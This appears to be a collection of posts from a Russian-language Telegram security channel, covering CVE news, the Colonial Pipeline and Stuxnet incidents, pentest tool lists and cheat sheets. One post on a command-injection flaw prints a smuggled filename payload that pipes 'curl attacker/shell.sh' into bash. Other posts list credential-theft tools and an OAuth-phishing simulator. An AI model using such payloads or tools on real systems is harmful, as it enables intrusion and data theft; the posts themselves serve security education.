И смешно и грустно 😾

🐸 Библиотека хакера

#hack_humor

📌 Свежие апдейты ИБ

Коротко и по делу — что реально важно из последних уязвимостей и обновлений.

⚠️ Критическая RCE в React / Next.js

В Server Components обнаружена уязвимость CVE-2025-55182, позволяющая выполнить произвольный код удалённо.

Кого касается:
React 19.0–19.2.0, RSC-бандлы под Webpack/Parcel/Turbopack, а также проекты на Next.js.

Что делать:
— срочное обновление зависимостей;
— временно отключить RSC в критичных сервисах.

📱 Android — декабрьские патчи закрывают 0-day

Google выпустила декабрьский бюллетень: более 100 уязвимостей закрыты, несколько из них активно эксплуатировались («in the wild»).

Ключевое:
— уязвимости в Android Framework;
— риск полного компромета устройства без взаимодействия пользователя.

🤖 AI × безопасность: новые рекомендации CISA для OT/ICS

CISA выпустила руководство по безопасной интеграции AI в промышленную инфраструктуру.

Почему важно:
AI всё чаще участвует в атаках — от автоматизации фишинга до генерации эксплойтов. OT-системам приходится адаптировать защиту.

🔹 Курс «Программирование на языке Python»
🔹 Получить консультацию менеджера
🔹 Сайт Академии 🔹 Сайт Proglib

🐸 Библиотека хакера

#patch_notes

👌 Как один пароль остановил бензин в США

Одна скомпрометированная учётка — и крупнейший топливопровод страны встал на 6 дней. Не технологичный zero-day, а банальный VPN без двухфакторки. Но последствия оказались масштабнее, чем у многих громких эксплойтов.

🔍 Как это произошло:

• DarkSide проникла через скомпрометированный VPN-аккаунт (без 2FA)
• Зашифровали billing-системы и украли 100GB данных
• Компания экстренно остановила весь трубопровод на 6 дней

🔤 Последствия:

— Дефицит топлива на Восточном побережье
— Паника на заправках, очереди, рост цен
— Режим ЧС в 17 штатах
— Выкуп $4.4M в BTC (75 BTC)

📌 Что интересно:

Colonial заплатила выкуп через несколько часов. FBI позже отследила и вернула $2.3M — взломав кошелёк DarkSide или получив ключи (точных данных нет).

Сама атака была технически простой: старый VPN + слабый пароль. Но последствия показали, как ransomware превратился из проблемы IT в угрозу национальной безопасности.

DarkSide закрылась через 2 недели после атаки под давлением властей.

📎 Если хотите копнуть глубже — подкаст Malicious Life разобрал эту историю с двух сторон: в Episode 118 технический разбор атаки от главы threat research Cybereason, а в Episode 226 — про главную дилемму: платить выкуп или нет. Там разбирают, почему FBI само заплатило $4.4M, хотя публично призывает никогда этого не делать.

🐸 Библиотека хакера

#zero_day_legends

🎯 Разбор уязвимостей

Самая жёсткая уязвимость здесь — 🔥 Command Injection в /api/backup.
Это прямой RCE через shell=True + невалидированный filename.

И да, один из ребят уже очень подробно и метко разнёс этот кусок, подчёркивая, что эта строка — буквально «портал в ад». Разбор действительно точный — и технически полностью верный.

Почему /api/backup — самая опасная:

📌 Мгновенное выполнение произвольных команд

subprocess.run(cmd, shell=True) = полный контроль над системой.

📌 Нет ни фильтрации, ни экранирования

Можно инжектить любые последовательности команд.

📌 В команду встроены креды базы

-p'secret123' расширяет возможности атаки до полного доступа к БД.

Пример эксплуатации:

filename: "x.sql'; curl attacker/shell.sh | bash; echo ‘»

⚠️ Остальные уязвимости:

SQL Injection в /api/search — серьёзно, но ограничено БД
Command Injection в /api/ping — опасно, но имеет меньше возможностей
Hardcoded creds — плохо, но не даёт RCE само по себе

🐸 Библиотека хакера

#ctf_challenge

🔍 Шпаргалки цифрового детектива

Справочник по расположению цифровых артефактов для расследования инцидентов.

🔴 Что внутри:
• Windows — реестр, логи, prefetch, браузеры, USB
• macOS/iOS — plist, sqlite, unified logs, Apple apps
• Android — мессенджеры, соцсети, системные настройки

🔴 Для кого:
Digital forensics, incident response, threat hunting

62 страницы практики для ИБ-специалистов.

🐸 Библиотека хакера

#cheat_sheet

👀 Вот она — легендарная сцена взлома

PowerBook 5300 против технологий, пересекающих галактику.
Время работы: несколько часов.
Результат: полная победа человечества.

Теперь вы знаете, почему это невозможно 👆

🐸 Библиотека хакера

#hollywood_hack

🐸 Библиотека хакера

#hack_humor

🚩 Kubenomicon: от взлома пода до захвата кластера

Практическое руководство по атакам на K8s — от initial access до полного захвата. Весь kill chain разложен по MITRE ATT&CK.

🎥 Что покрывает:

— Получение доступа (компромисс образов, kubeconfig, cloud credentials)
— Закрепление (backdoor containers, malicious admission controllers)
— Повышение привилегий (privileged containers, RBAC escalation)
— Lateral movement (CoreDNS poisoning, ARP spoofing)
— Impact (cryptomining, DoS, data destruction)

Плюс раздел с основами: RBAC, etcd, kubelet, secrets — всё что нужно знать про архитектуру перед атакой.

🎥Годится для:

✓ Red team — готовые векторы атак
✓ Pentest — чеклист для аудита
✓ Blue team — понимание что защищать

📎 Kubenomicon
📎 GitHub

🐸 Библиотека хакера

#resource_drop

💳 100 команд Kali Linux для пентестинга

Часть 1 — сети, разведка, уязвимости, MITM, веб-аудит
Часть 2 — эксплуатация, пароли, реверс, криминалистика, форензика

➕ Эксплуатация и создание полезных нагрузок

• metasploit — фреймворк эксплуатации уязвимостей.
• armitage — GUI для Metasploit.
• msfvenom — генерация payload’ов.
• msfpc — создание полезных нагрузок Metasploit.
• veil — генерация скрытых исполняемых файлов.
• exploitdb — локальная база эксплойтов.
• db_nmap — запуск Nmap из Metasploit.

➕ Пароли, хэши и аутентификация
• hydra — брутфорс сетевых сервисов.
• john (John the Ripper) — офлайн-взлом хэшей.
• hashcat — высокопроизводительный взлом хэшей.
• hashcat-utils — утилиты для работы с хэшами.
• hash-identifier — определяет тип хэша.
• samdump2 — извлекает хэши из SAM Windows.
• chntpw — сбрасывает пароли Windows.
• mimikatz — извлекает креды из памяти Windows.
• pcredz — получает учётки из дампов памяти.
• ssh-keygen — создаёт SSH-ключи.

➕ Файлы, цифровая криминалистика и реверс
• volatility — анализ дампов оперативной памяти.
• autopsy — платформа цифровой криминалистики.
• binwalk — анализ бинарных образов, извлечение данных.
• foremost — восстановление удалённых файлов.
• scalpel — расширенное file-carving восстановление.
• exiftool — чтение/запись метаданных файлов.
• pdf-parser — анализ PDF.
• steghide — скрытие данных в изображениях/аудио.
• stegcracker — брутфорс стеганографических контейнеров.
• radare2 — фреймворк реверс-инжиниринга.
• udis86 — дизассемблер x86/x64.
• mac-robber — сбор MAC-временных меток файлов.
• ipcalc — расчёт параметров IP-сетей.
• yara — поиск вредоносных паттернов в файлах.

➕ Реверс-инжиниринг

• radare2 — фреймворк реверса.
• udis86 — дизассемблер x86/64.

➕ Инфраструктурный пентест

• sparta — GUI для сетевых тестов.
• nmapsi4 — графический интерфейс Nmap.
• enum4linux — разведка Windows/Samba.
• enumiax — разведка Asterisk PBX.

🐸 Библиотека хакера

#cheat_sheet

👌 Когда USB-флешка становится оружием массового поражения

Stuxnet — первое публично известное кибероружие, созданное государством для физического уничтожения инфраструктуры. Разработка обошлась в сотни миллионов долларов.

🔍 Как это работало:

• Цель — изолированные системы завода Натанз (без интернета, air-gapped)
• Заражение через USB-накопители сотрудников и подрядчиков
• 4 zero-day уязвимости Windows + украденные сертификаты Realtek и JMicron
• Перепрограммирование Siemens PLC-контроллеров центрифуг
• Червь незаметно ускорял и замедлял вращение — физический износ
• Операторам показывались нормальные данные

🔤 Последствия:

— ~1000 центрифуг уничтожено (20% от всех на заводе)
— Ядерная программа откатилась на 2+ года назад
— Первое доказательство: код может рушить реальные объекты
— Червь случайно распространился глобально — так его обнаружили

📌 Что интересно:

Официально никто не признал авторство, но эксперты указывают на совместную операцию США и Израиля (кодовое имя "Olympic Games"). Сложность на порядки выше любого криминального малвара — бюджет государственного уровня.

🔗 Вся история в документалке "Zero Days" и книге "Countdown to Zero Day" Ким Зеттер. Для быстрого погружения — Darknet Diaries, Episode 29.

🔹 Курс «Программирование на языке Python»
🔹 Получить консультацию менеджера
🔹 Сайт Академии 🔹 Сайт Proglib

🐸 Библиотека хакера

#zero_day_legends

🔍 Шпаргалка по фильтрам Wireshark для анализа сетевого трафика и поиска угроз

🔤 Что внутри:

• Capture Filters — для захвата трафика
• Display Filters — для отображения данных
• Готовые фильтры для HTTP, DNS, SMTP
• Детектирование worms и эксплойтов
• Практические примеры для реальных задач

🎯 Для кого:
Специалисты по ИБ, SOC-аналитики, сетевые инженеры, пентестеры

🐸 Библиотека хакера

#cheat_sheet

🔐 Главный инцидент начала декабря: React2Shell

В начале месяца индустрия столкнулась с одной из самых серьёзных уязвимостей года — React2Shell. Ошибка в серверных компонентах React (RSC) открывала возможность удалённого выполнения кода без аутентификации — фактически полный контроль над сервером приложения.

➕ Что затронуто:

Фреймворки и инструменты, использующие RSC:
• Next.js
• React Router
• Waku
• Vite RSC
• Parcel RSC
• кастомные RSC-решения

Уязвимые версии React: 19.0.0–19.2.0.
Степень угрозы: CVSS 10.0.

➕ Как реагировало сообщество:

— разработчики массово обновляли зависимости
— компании запускали сканирование продакшена
— вендоры публиковали технические рекомендации и патчи
— уязвимость включили в списки критических угроз, требующих немедленных мер

‼️ React2Shell стала ключевой темой безопасности, резко повлияв на процессы разработки и эксплуатацию современных фронтенд-фреймворков.

Почитать 🔜

🔗 Блог BI.ZONE
🔗 Блог React.dev

🐸 Библиотека хакера

#cve_bulletin

🆕 Telegram включил поддержку Passkey — без СМС и пароля

Теперь войти в аккаунт можно через криптографический ключ, который хранится в менеджере паролей и подтверждается биометрией — Face ID, Touch ID или код-паролем.

Новая опция появилась в Настройки → Конфиденциальность. Это очередной шаг мессенджера к снижению зависимости от СМС: недавно добавили вход по e-mail, а теперь — полноценные Passkey.

• На рынке продолжаются проблемы с доставкой регистрационных СМС.
• Операторам, по данным источников, предписали блокировать сообщения и звонки новым пользователям Telegram и WhatsApp.
• Ранее регулятор уже ограничивал звонки и работу мессенджеров, мотивируя это борьбой с мошенничеством.

🔢 Telegram отвечает усилением модерации и альтернативными способами входа.

🔗 Источник

🐸 Библиотека хакера

#patch_notes

📎 365-Stealer

Инструмент для безопасной симуляции Illicit Consent Grant Attack в Microsoft 365. Показывает, что произойдёт, если пользователь согласится на вредоносное OAuth-приложение.

🔤 Что умеет:

— Моделирует фишинговый запрос OAuth-разрешений.
— Демонстрирует, какие данные может получить злоумышленник (почта, файлы, контакты).
— Работает через Microsoft Graph и готовые профили разрешений.
— Сохраняет артефакты в удобной структуре (yourVictims/).
— Python-скрипт с минимальными зависимостями.

🔤 CLI:

python3 365-Stealer.py
python3 app_registration.py
ls ./yourVictims/

🔤 Где полезен:

— Проверка политики consent-grant.
— Тренировки для blue team и red team.
— Демонстрация рисков для руководства.
— Учебные лаборатории SOC.

📎 Ссылка на GitHub

🔹 Курс «Программирование на языке Python»
🔹 Получить консультацию менеджера
🔹 Сайт Академии 🔹 Сайт Proglib

🐸 Библиотека хакера

#tool_of_the_week